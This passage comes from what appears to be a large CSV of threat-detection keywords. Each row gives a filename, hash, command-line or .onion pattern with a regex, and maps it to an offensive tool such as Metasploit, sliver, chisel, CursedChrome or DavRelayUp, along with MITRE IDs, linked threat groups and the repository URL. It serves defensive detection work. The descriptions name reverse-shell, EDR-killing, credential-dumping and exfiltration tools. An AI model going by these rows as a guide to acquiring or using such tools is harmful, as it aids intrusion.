LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","40146"
"*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40147"
"*DarkRCovery.exe*",".{0,1000}DarkRCovery\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","40148"
"*Darkside.exe -p*",".{0,1000}Darkside\.exe\s\-p.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","0","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","40149"
"*Darkside-master.zip*",".{0,1000}Darkside\-master\.zip.{0,1000}","offensive_tool_keyword","Darkside","C# AV/EDR Killer using less-known driver (BYOVD)","T1547.006 - T1055 - T1562.001","TA0005 - TA0003 - TA0004  ","N/A","N/A","Defense Evasion","https://github.com/ph4nt0mbyt3/Darkside","1","1","N/A","N/A","10","2","175","34","2023-11-10T16:01:21Z","2023-11-10T15:34:20Z","40150"
"*darkweb2017-top100.txt*",".{0,1000}darkweb2017\-top100\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","40151"
"*DarkWidow-main*",".{0,1000}DarkWidow\-main.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","40152"
"*das add -db dbname masscan *",".{0,1000}das\sadd\s\-db\sdbname\smasscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40153"
"*das add -db dbname rustscan *",".{0,1000}das\sadd\s\-db\sdbname\srustscan\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40154"
"*das report -hosts 192.168.1.0/24 -oA report2*",".{0,1000}das\sreport\s\-hosts\s192\.168\.1\.0\/24\s\-oA\sreport2.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40155"
"*das scan -db dbname -hosts all -oA report1 -nmap '-Pn -sVC -O' -parallel*",".{0,1000}das\sscan\s\-db\sdbname\s\-hosts\sall\s\-oA\sreport1\s\-nmap\s\'\-Pn\s\-sVC\s\-O\'\s\-parallel.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40156"
"*das scan -db dbname -ports 22*80*443*445 -show*",".{0,1000}das\sscan\s\-db\sdbname\s\-ports\s22.{0,1000}80.{0,1000}443.{0,1000}445\s\-show.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40157"
"*dashlane2john.py*",".{0,1000}dashlane2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","40159"
"*Data Name=""ServiceName"">chopper</Data>*",".{0,1000}Data\sName\=\""ServiceName\""\>chopper\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#servicename","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","40160"
"*Data Name=""ServiceName"">final_seg</Data>*",".{0,1000}Data\sName\=\""ServiceName\""\>final_seg\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#servicename","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","40161"
"*Data Name=""ServiceName"">let me in</Data>*",".{0,1000}Data\sName\=\""ServiceName\""\>let\sme\sin\<\/Data\>.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","#servicename","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","40162"
"*Data Name=""ServiceName"">procexp</Data>*",".{0,1000}Data\sName\=\""ServiceName\""\>procexp\<\/Data\>.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Persistence","https://github.com/trustedsec/The_Shelf","1","0","N/A","ServiceName","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","40163"
"*data/implant/*/host.ps1*",".{0,1000}data\/implant\/.{0,1000}\/host\.ps1.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","40166"
"*data/ipwn*",".{0,1000}data\/ipwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40167"
"*data/payloads/stager.ps1*",".{0,1000}data\/payloads\/stager\.ps1.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","LockBit","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","N/A","10","10","779","223","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z","40168"
"*data/shell/backdoors*",".{0,1000}data\/shell\/backdoors.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","40169"
"*data/shell/stagers*",".{0,1000}data\/shell\/stagers.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","1","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","40170"
"*data/wordlist_256.txt*",".{0,1000}data\/wordlist_256\.txt.{0,1000}","offensive_tool_keyword","dnscat","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","1","#linux","N/A","10","10","3566","618","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z","40171"
"*data/wordlists*",".{0,1000}data\/wordlists.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40172"
"*Data\VulnerableCOM.csv*",".{0,1000}Data\\VulnerableCOM\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","40173"
"*database/c2.db*",".{0,1000}database\/c2\.db.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","40174"
"*DATABASE_PASSWORD: cursedchrome*",".{0,1000}DATABASE_PASSWORD\:\scursedchrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","40175"
"*DATABASE_USER: cursedchrome*",".{0,1000}DATABASE_USER\:\scursedchrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","40176"
"*DataBouncing-main.zip*",".{0,1000}DataBouncing\-main\.zip.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","40177"
"*DataSploit*",".{0,1000}DataSploit.{0,1000}","offensive_tool_keyword","datasploit","Performs OSINT on a domain / email / username / phone and find out information from different sources","T1247 - T1593 - T1271 - T1110 - T1122 - T1123","TA0002 - TA0009","N/A","N/A","Reconnaissance","https://github.com/dvopsway/datasploit","1","1","N/A","N/A","N/A","3","279","674","2022-12-04T16:02:57Z","2016-05-26T03:34:43Z","40180"
"*datr=80ZzUfKqDOjwL8pauwqMjHTa*",".{0,1000}datr\=80ZzUfKqDOjwL8pauwqMjHTa.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","40181"
"*DavidXanatos/DiskCryptor*",".{0,1000}DavidXanatos\/DiskCryptor.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","40182"
"*DavRelayUp.csproj*",".{0,1000}DavRelayUp\.csproj.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40183"
"*DavRelayUp.exe*",".{0,1000}DavRelayUp\.exe.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40184"
"*DavRelayUp.sln*",".{0,1000}DavRelayUp\.sln.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40185"
"*DavRelayUp-master*",".{0,1000}DavRelayUp\-master.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","40186"
"*davtdavm734bl4hkr3sr4dvfzpdzuzei2zrcor4vte4a3xuok2rxcmyd.onion*",".{0,1000}davtdavm734bl4hkr3sr4dvfzpdzuzei2zrcor4vte4a3xuok2rxcmyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40187"
"*Daybr4ak/C2ReverseProxy*",".{0,1000}Daybr4ak\/C2ReverseProxy.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","40188"
"*dazzleUP.cna*",".{0,1000}dazzleUP\.cna.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40189"
"*dazzleUP.exe*",".{0,1000}dazzleUP\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40190"
"*dazzleUP.sln*",".{0,1000}dazzleUP\.sln.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40191"
"*dazzleUP.vcxproj*",".{0,1000}dazzleUP\.vcxproj.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40192"
"*dazzleUP.x32.exe*",".{0,1000}dazzleUP\.x32\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40193"
"*dazzleUP.x64.exe*",".{0,1000}dazzleUP\.x64\.exe.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40194"
"*dazzleUP_Reflective_DLL*",".{0,1000}dazzleUP_Reflective_DLL.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40195"
"*dazzleUP-master*",".{0,1000}dazzleUP\-master.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","40196"
"*db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e*",".{0,1000}db03400af112a7969ba2d68288b9dc908b2d234d62184fd5f01079749c4bf09e.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","40198"
"*db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363*",".{0,1000}db0db42180fbc1a5bc259234ec07d437986660e88545a49563f4f5ccb761c363.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40199"
"*db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93*",".{0,1000}db0e36392ef1430eae933b1fd0e94c0dd4f7d08ed93cfe369a7d73ed76082c93.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40200"
"*db1288eace30cc5f6f942df1596f94ba846ed8fee9772ad68fc45a5efac6d6db*",".{0,1000}db1288eace30cc5f6f942df1596f94ba846ed8fee9772ad68fc45a5efac6d6db.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","40201"
"*db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676*",".{0,1000}db15d8f9e04fd3d793065e806b32df940949676a7b5013be10b1285fd4cd5676.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","40202"
"*db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f*",".{0,1000}db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40203"
"*db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b*",".{0,1000}db192e3adff9cfb3777dc44fbe037aee648af60c203832d7a5f7ac41e265f01b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","40204"
"*db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895*",".{0,1000}db1f07bcc1caabad3c0a5bbeddf48f542193e0576e8c3ee42594c4a3e29d8895.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40206"
"*db2_default_pass.txt*",".{0,1000}db2_default_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - 